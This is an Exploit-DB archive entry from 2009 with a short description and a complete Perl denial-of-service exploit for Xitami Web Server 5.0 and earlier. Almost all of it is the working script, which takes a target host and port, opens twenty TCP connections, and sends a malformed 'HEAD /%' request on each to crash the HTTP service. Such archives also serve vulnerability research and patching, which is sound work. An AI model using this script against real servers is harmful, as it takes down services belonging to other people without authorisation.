Xitami Web Server <= 5.0 - Remote Denial of Service Exploit

2009-04-22T00:00:00
ID EDB-ID:8511
Type exploitdb
Reporter Jonathan Salwan
Modified 2009-04-22T00:00:00

Description

Xitami Web Server <= 5.0 Remote Denial of Service Exploit. Dos exploit for windows platform

                                        
                                            #!/usr/bin/perl
#
# Xitami HTTP Server &lt;= v5.0 Remote Denial of Service.
#
# ------------------------------------------------------------------------------
# The vulnerability is caused due to an error with HEAD request and multi-socket
# This can be exploited to crash the HTTP service.
# ------------------------------------------------------------------------------
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org


use IO::Socket;
print "[+] Author : Jonathan Salwan\n";
print "[+] Soft   : Xitami HTTP Server v5.0\n";

	if (@ARGV &lt; 1)
		{
 		print "[-] Usage: &lt;file.pl&gt; &lt;host&gt; &lt;port&gt;\n";
 		print "[-] Exemple: file.pl 127.0.0.1 80\n";
 		exit;
		}


	$ip 	= $ARGV[0];
	$port 	= $ARGV[1];

print "[+] Sending request...\n";


for($i=0;$i&lt;20;$i++)
{
$socket = IO::Socket::INET-&gt;new( Proto =&gt; "tcp", PeerAddr =&gt; "$ip", PeerPort =&gt; "$port") || die "[-] Failed\n";

	print $socket "HEAD /% HTTP/1.0\r\n\r\n";
}

print "[+] Done!\n";

# milw0rm.com [2009-04-22]